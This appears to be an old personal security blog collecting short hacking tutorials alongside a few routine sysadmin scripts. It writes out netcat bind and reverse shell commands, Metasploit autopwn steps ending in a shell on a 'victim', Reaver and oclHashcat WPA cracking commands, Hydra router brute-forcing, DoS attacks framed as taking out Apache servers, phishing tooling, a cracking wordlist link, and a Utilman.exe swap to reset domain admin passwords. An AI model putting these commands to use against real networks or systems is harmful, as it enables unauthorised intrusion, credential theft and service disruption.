Mauris Tech Blog

Mauris Passlist / Channel-Blog Updates / Wireshark / Nmap

2013-04-22T00:17:00.003+02:00

News and Updates @ MaurisTechBlog

Here you can find the Updated Password List, its still the BEST Passwordlist:

Link: https://app.dumptruck.goldenfrog.com/p/O10ZURAU91

Password: maurisdump.blogspot.com

-----------------------------------------------------

The best way of staying in touch with me is our youtube channel at:

http://www.youtube.com/mauristechchannel

Just Subscribe and get informed about the latest exploits / videos and howtos

What can you expect in the near future:

Nmap Advanced Videos - Forensic and Pentesting with Nmap
Top10 Tools for Network Hacking
The most detailed Howto about Wireshark - Wireshark 101 for Advanced Pentesting

Feel free to post comments about topics you want to be covered by me.

Howto Upgrade Backtrack 5 R2 to R3

2012-08-14T21:41:00.004+02:00

sdsdsdsdHowto Upgrade Backtrack R2 to R3:

First of all, make sure everything is fully updated:

apt-get update && apt-get dist-upgrade

If you are using the 32bit Version type the following command:

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2

netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya

manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest

acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec

websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite

tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox

smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

if you are using the 64bit Version type the following command:

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable
jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt
lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer
jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit
dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump
android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit

smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

Thats all you need to Upgrade from R2 to R3. Have Fun.

BackTrack 5 R3 released

2012-08-14T13:48:00.001+02:00

From the Official Website:

"...The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links..."

Torrent Files:

BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)

BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)

BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)

BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)

BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

HexorBase - The Database Hacker Tool - MySql, Oracle, PostgreSQL, SQLlite, MS-Sql

2012-08-08T20:44:00.001+02:00

HexorBase - The Database Hacker Tool ( MySql, Oracle, PostgreSQL, SQLlite, MS-Sql )

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:

Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2

To install simply run the following command in terminal after changing directory to the path were the downloaded package is:

root@host:~# dpkg -i hexorbase_1.0_all.deb

Icons and Running the application:
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "HexorBase.desktop"

To get the source code for this project from SVN, here's the checkout link:
root@host:~# svn checkout http://hexorbase.googlecode.com/svn/

Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver

2012-01-27T06:09:00.001+01:00

Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities

Although NetCat is not the state of the art tool anymore and it sends all packets uncrypted through the net, it´s still a very good tool for easy banner grabbing, binding shells or reverse shells.

Banner Grabbing Commandline:

nc -v 192.168.0.200 21

nslookup -querytype=mx debian.org
nc -v xxx.debian.org 25

nslookup -querytype=mx dell.com
nc -v xxx.dell.com 25

nc -v 192.168.0.200 80
GET / HTTP/1.1

nc -v www.dell.com 80
GET / HTTP/1.1

nc -v 192.168.0.200 21

Weberserver Commandline:

while true; do nc -l -p 80 -q 1 < bla.html; done

File Transfer Commandline:

windows maschine file server nc -lvp 4444 > captured.txt
linux maschine: nc -v target-ip < info.txt this cmd will send the content of the file INFO.TXT to the Server into the file CAPTURED.TXT

Shell Commandlines:

Bind Shell

windows maschine: nc -lvp 4444 -e cmd.exe
linux maschine: nc -v 192.168.0.200 4444

Connecting from the linux system to the windows system,
which isn´t located behind a NAT System.

Reverse Shell

windows maschine: nc -lvp 4444
linux maschine: nc -nv 192.168.0.200 4444 -e /bin/bash
/sbin/ifconfig

Sending a /bin/bash Shell from a Linux system behind a NAT to the
windows system, which is listening on port 4444. traversing NAT.

Owasp HTTP POST DoS Apache Webserver Attack

2012-01-24T07:52:00.000+01:00

This Tutorials shows, how you can easily take out an Apache Webserver with one HTTP POST Tool using a std. slow DSL Connection.

This is NO Slowloris Attack!

Limitations of HTTP GET DDOS attack:

- Does not work on IIS web servers or web
servers with timeout limits for HTTP headers.

- Easily defensible using popular load balancers,
such as F5 and Cisco, reverse proxies and
certain Apache modules, such as mod_antiloris.

- Anti-DDOS systems may use "delayed
binding"/"TCP Splicing" to defend against HTTP
GET attacks.

Why HTTP POST DDOS attack works

- This attack can evade Layer 4 detection
techniques as there is no malformed TCP, just
like Slowloris.

- Unlike Slowloris, there is no delay in sending
HTTP Header, hence nullifying IIS built-in
defense, making IIS vulnerable too.

- Size, character sets and time intervals can be
randomised to foil any recognition of Layer 7
traffic patterns by DDOS protection systems.

- Difficult to differentiate from legit connections
which are slow

Fully Automated Mass WPA / WEP Hacker with Wifite ( wifite.py ) and cracking key with oclHashcat

2012-01-23T05:26:00.002+01:00

Fully Automated Mass WPA / WEP Hacking with Wifite ( wifite.py )
converting the .cap File and resolving the WPA Key with oclHashcat-64

In this Tutorial you learn how to Capture a WPA2 Handshake with a GUI Powered Tool ( wifite.py );
later we upload the capture file to http://hashcat.net/cap2hccap/ to generate a .hccap file which we will crack with oclHashCat-64.

Some Informations about the Tools:

Wifite:

This project is available in French: all thanks goto Matt² for his excellent translation!
sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all WPA handshakes are backed up to wifite.py's current directory
smart WPA deauthentication -- cycles between all clients and broadcast deauths
stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
switching WEP attack methods does not reset IVs
intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
SKA support (untested)
displays session summary at exit; shows any cracked keys
all passwords saved to log.txt
built-in updater: ./wifite.py -upgrade

Requirements

linux operating system (confirmed working on Ubuntu 8.10 (BT4R1), Ubuntu 10.04.1)
tested working with python 2.4.5 and python 2.5.2; might be compatible with other versions,
wireless drivers patched for monitor mode and injection: backtrack4 has many pre-patched drivers,
aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or by clicking here,
xterm, python-tk module: required for GUI, available via apt: apt-get install python-tk
macchanger: also available via apt: apt-get install macchanger
pyrit: not required, optionally strips wpa handshake from .cap files

oclHashcat-plus

Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker
Worlds first and only GPGPU based rule engine
Free
Multi-GPU (up to 16 gpus)
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux & Windows native binaries)
Multi-Platform (OpenCL & CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or play games while cracking
Focuses highly iterated, modern hashes
Focuses single dictionary based attacks
Supports pause / resume while cracking
Supports reading words from file
Supports reading words from stdin
Integrated thermal watchdog
20+ Algorithms implemented with performance in mind

If you have any question, leave a note.

Reaver 1.4 WPS Bruteforcing Tool - Upgrade/Installation/Usage

2012-01-21T04:59:00.000+01:00

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

Then Start ./wash -i mon0 to scan for valid Wifis.

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Adobe.com Cross Site Scripting Problem

2012-01-17T04:50:00.001+01:00

AdobeTV seems to have a little Cross Site Scripting Problem =)

https://tv.adobe.com/login/login?redirect=index.cfm

UPDATE: The BEST Dictionaries & Wordlist for WPA Cracking

2012-01-07T14:34:00.000+01:00

This is a 18 in 1 WPA Edition Password List, its not only a combination of Passwords:

Merged each 'collection' into one file (minus the 'readmes' files)
Removed leading & trailing spaces & tabs
Converted all 'new lines' to 'Unix' format
Removed non-printable characters
Removed HTML tags (Complete and common incomplete tags)
Removed (common domains) email addresses
Removed duplicate entries
How much would be used if they were for 'cracking WPA' (Between 8-63 characters)

All the Credits for the work go to g0tmi1k !!! Visit his Site for closer Informations !

Download Full 18in1 cleaned Password List:
Compressed 4,8GB ( 24 Files, 7-Zip ) / Extracted 39,1GB ( 1 File, .lst )

UPDATE FROM: 07.08.2012

https://app.dumptruck.goldenfrog.com/p/O10ZURAU91

Use this Download Link ONLY!

Password: maurisdump.blogspot.com

This Collection was used to create the 18in1 WPA Edition:

http://www.skullsecurity.org/wiki/index.php/Passwords
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database
http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/

Router Hacking with Hydra - Very Fast

2012-01-02T23:05:00.002+01:00

Update: New Video Version

In this short video you can see how effectiv hydra/xhydra works with a passwordlist against routers,
weblogins and other authentication forms.

THC-Hydra - the best parallized login hacker:

Samba, FTP, POP3,
IMAP, Telnet, HTTP Auth,
LDAP,NNTP, MySQL, VNC,
ICQ, Socks5, PCNFS,
Cisco and more. Includes SSL support and is part of Nessus.

Automated Mass WPA / WEP Hacker with Wifite ( wifite.py )

2011-12-31T15:28:00.003+01:00

NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO

The Purpose is to attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments.

Features:

sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all WPA handshakes are backed up to wifite.py's current directory
smart WPA deauthentication -- cycles between all clients and broadcast deauths
stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
switching WEP attack methods does not reset IVs
intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
SKA support (untested)
displays session summary at exit; shows any cracked keys
all passwords saved to log.txt
built-in updater: ./wifite.py -upgrade

SIOCSIFFLAGS: Unknown error 132 message

2011-12-30T15:24:00.002+01:00

If you are using Backtrack 5 or Backtrack 5 R1 within a Vmware while using USB Wifi Devices like the RTL8187 Chipset ( ALFA AWUS 036H ) you run probably into this Error Message:

airmon-ng start wlan0

SIOCSIFFLAGS: Unknown error 132 message

To solve this issue, use the following commands:

prepare-kernel-sources

cd /usr/src/linux/drivers/net/wireless/rtl818x/rtl8187/

wget http://backtrack-linux.org/silly-rfkill-patch.patch

patch -p0 < silly-rfkill-patch.patch

cd /usr/src/linux

make drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko

cp drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/2.6.39.4/kernel/drivers
/net/wireless/rtl818x/rtl8187/rtl8187.ko

After that reboot your vmware/backtrack, and your issue is solved.

Reaver 1.2 WPS Brute Force Cracker to recover Passphrase

2011-12-30T12:31:00.002+01:00

NEW VIDEO - NEW VIDEO

NEW Reaver 1.4 Tutorial

http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

How to Convert your.cap File to hccap for use with oclHashCat for WPA

2011-12-26T08:28:00.001+01:00

Upload your .cap file to the following cap2hccap convert Service:

http://hashcat.net/cap2hccap/

Then use oclhashcat-plus to crack it, command for using with ATI GPU´s:

Open a Dosbox, use the following cmd-line:

C:\oclHashcat-plus-0.06\oclHashcat-plus64.exe -m 2500 D:\oclHashcat-plus-0.06\1.hccap D:\oclHashcat-plus-0.06\wpa.txt

-m 2500 -> defines that we want to crack a WPA file
wpa.txt -> your Dictionarie / Wordlist File

Note:

If you encounter difficulties regarding the opencl.dll, just download the latest ATI Catalyst Drivers and select the ATI SDK and install it, works without a reboot.

Strip WPA2 Handshake with Wireshark

2011-12-24T14:11:00.003+01:00

How to Strip your Handshake with Wireshark:

Open your Capture in Wireshark

Enter "eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08" as filter expression (without quotes) then press "Apply"

Go to File -> Save As... Menu, Enter new File name and select "Displayed" to save filtered packets only.

Easy Apache / IIS Slow Header Attack

2011-12-13T23:55:00.004+01:00

Slow Header Attack

The Slow Header attack works by exploiting the Client idle timeout value on the server side. This timeout is configured on server side to drop a client connection if a client was found idle during the time interval. The Slow header attack finds the approximate timeout value set in Server side and then chooses a value which is lower than the configured value. The attack then initiates a Http Request with Partial header to the server. It keeps sending one header based on the chosen value and this way Client idle timeout will not be triggered on the server side and Request will not be complete

In essence you can send a Denial Of Service attack to website using one laptop over a proxy.

2011-12-13T23:52:00.001+01:00

How to own a Windows XP SP3 Box with Metasploit / Backtrack.

Tutorial: Metasploit DB Autopwning

Commands:

/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start metasploit

db_connect pentest # connect to database
db_nmap HOST IP/ HOSTNAME # Scan for open Ports
db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports

Wait until a Meterpreter Session, like:

*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

Wait until the Attack is over or STRG+C to Terminate the Attack.

Now:

Sessions # shows your connects to the victim
Session -i 1 # you join session 1
shell # opens reverse shell on victim

Use the help function, to get information about other available commands.

FOR EDUCATIONAL PURPOSES ONLY

2011-12-13T23:50:00.000+01:00

HexorBase - The Database Hacker Tool

Hexorbase is capable of connecting to any remote accesable database, performing SQL queries and bruteforce attacks against:
mySQL, Oracle, SQlite, SQLserver and PostgreSQL

Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver

2011-12-13T23:40:00.004+01:00

Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver

Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honey pot , could be used to service DHCP request , DNS requests or phishing attacks.

How to allow root user ssh access

2011-10-07T14:50:00.003+02:00

How to grant root User SSH Access

cmd-line:

sed -e 's/PermitRootLogin no/PermitRootLogin yes/' -i /etc/ssh/sshd_config
/sbin/service sshd reload

This allowes SSH Access for the user "root".

Lancom Commands

2011-10-07T14:37:00.003+02:00

trace + all schaltet alle Trace-Ausgaben ein
trace - all schaltet alle Trace-Ausgaben aus
trace + protocol display schaltet die Ausgabe aller
Verrbindungsprotokolle und der Status- und
Fehlermeldungen ein

trace + all - icmp schaltet alle Trace-Ausgaben mit Ausnahme des
ICMP-Protokolls ein
trace ppp zeigt den Zustand des PPPs an
trace # ipx-rt display schaltet die Trace-Ausgaben des IPX-Routers
und der Display- Ausgaben um
trace + ip-router @ GEGENSTELLE-A GEGENSTELLE-B schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die sich auf die Gegenstellen A oder B
beziehen
trace + ip-router @ GEGENSTELLE-A
GEGENSTELLE-B -ICMP schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die sich auf die Gegenstellen A oder B
beziehen, die nicht ICMP verwenden
trace + ip-router @ +TCP + "port: 80" schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die TCP/IP und den Port 80
verwenden. “port: 80” steht in
Anführungszeichen, um auch das Leerzeichen als
Teil der Zeichenkette einzubeziehen.
trace + vpn-status display schaltet die Ausgaben für einen VPN-Status Trace
ein. Der Parameter display liefert zusätzlich
Status- und Error-Ausgaben.

Show LoginTime when Client logs on to Active Directory Domain

2010-01-28T15:08:00.004+01:00

This Script will generate the following Informations automaticly:

Show LoginTime when Client logs on to Active Directory Domain, Domain Server,
Password Age, etc.

function loginmail()

$shortuser = right(@userid,len(@userid)-0)
$objEmail=CreateObject('CDO.Message')
$objEmail.From = "Benutzer_LOGIN "
$objEmail.To = "NameIT@@Domain.TLD"
$objEmail.Subject='LOGIN_Benutzer '+$shortuser+', '+$shortuser2+'. hat sich an '+@wksta+' eingeloggt'
$objEmail.Textbody='-----------[ LOGIN ]-----------------'+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Benutzer: '+@userid+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Workstation: '+@wksta+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'IP: '+@ipaddress0+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Uhrzeit: '+@TIME+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Datum: '+@DATE+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Logon Server: '+@LServer+''+chr(10)+chr(10)
$objEmail.Textbody=$objEmail.Textbody + '-----------[ SYSTEM INFO ]------------'+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Passwordalter: '+@PWAge+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Betriebssystem: '+@ProductType+''+chr(10)
$objEmail.Textbody=$objEmail.Textbody + 'Servicepack: '+@CSD+''+chr(10)
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing").value = 2
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver").value = "your_SMTP_Server"
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate").value = 1
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusername").value = "LoginName_for_SMTP_Server"
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword").value = "Password_for_Authentication_to_SMTP_Server"
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport").value = 25
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl").value = False
$objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout").value = 60
$objEmail.Configuration.Fields.Update
$objEmail.Send
endfunction

-------------------------------------

-----------[ LOGIN ]-----------------
Benutzer: Thomas.Mann
Workstation: WorkstationName
IP: 192.192.192.192
Uhrzeit: 12:00:01
Datum: 2010/01/01
Logon Server: \\DomainControllerName01

-----------[ SYSTEM INFO ]------------
Passwordalter: 150 Days
Betriebssystem: Windows XP Professional
Servicepack: Service Pack 3

Reset Windows Server 2008 Domain Administrator Password

2010-01-26T12:26:00.002+01:00

Boot onto DVD of Windows Server 2008
Choose “Repair your computer”
Launch cmd
Go to c:\windows\system32
Rename Utilman.exe to Utilman.exe.bak
Copy cmd.exe to Utilman.exe
Reboot on Windows
Do the keyboard shortcut Windows + U when on the logon screen
net user administrator Newpass123 inside the cmd
log on with the domain admin account and this new pass
change the password to remember it if needed
Reboot on the DVD to put back the original Utilman.exe

Thx to mathieu chateau

Remove Recovery Points XX Days

2010-01-09T13:58:00.004+01:00

This Script allowes you to remove Recovery Points on a Microsoft Data Protection Manager 2007 Server, after XX Days.

Usage: RemoveRecoverypoints.PS1 "YourDPMserver" X
e.g.: RemoveRecoverypoints.PS1 "DPM01" 5
This will Remove All Recoverypoints, except those which are 5 max. days or less old.

param([string] $dpmname, [int32] $days )
function Usage()
{
write-host
write-host "Usage::"
write-host "RemoveRecoveryPoints.ps1 "DPMServername" Days(In int)"
write-host
}
if(("-?","-help") -contains $args[0])
{
Usage
exit 0
}
if(!$dpmname)
{
$dpmname = read-host "DPMServerName:"
}
if(!$days)
{
$days = read-host "Number of Days"
}
$pgList = Get-ProtectionGroup $dpmname
Foreach($pg in $pgList)
{
$Name = $pg.FriendlyName
Write-Host "Getting Data Source list for PG $Name..."
$dsList = Get-Datasource $pg
Foreach($ds in $dsList)
{
$Name = $ds.Name
Write-Host "Getting Recovery point list for Data-Source $Name ..."
$rpList = Get-RecoveryPoint $ds
Foreach($rp in $rpList)
{
$date = Get-Date
$datediff = $date - $rp.RepresentedPointInTime
$rpDays = $datediff.Days
Write-Host "Recovery Point is $rpDays days old "
if($rpDays -ge $days)
{
Write-Host "Removing Recovery Point older than $rpDays"
Remove-RecoveryPoint -RecoveryPoint $rp
}
}
}
}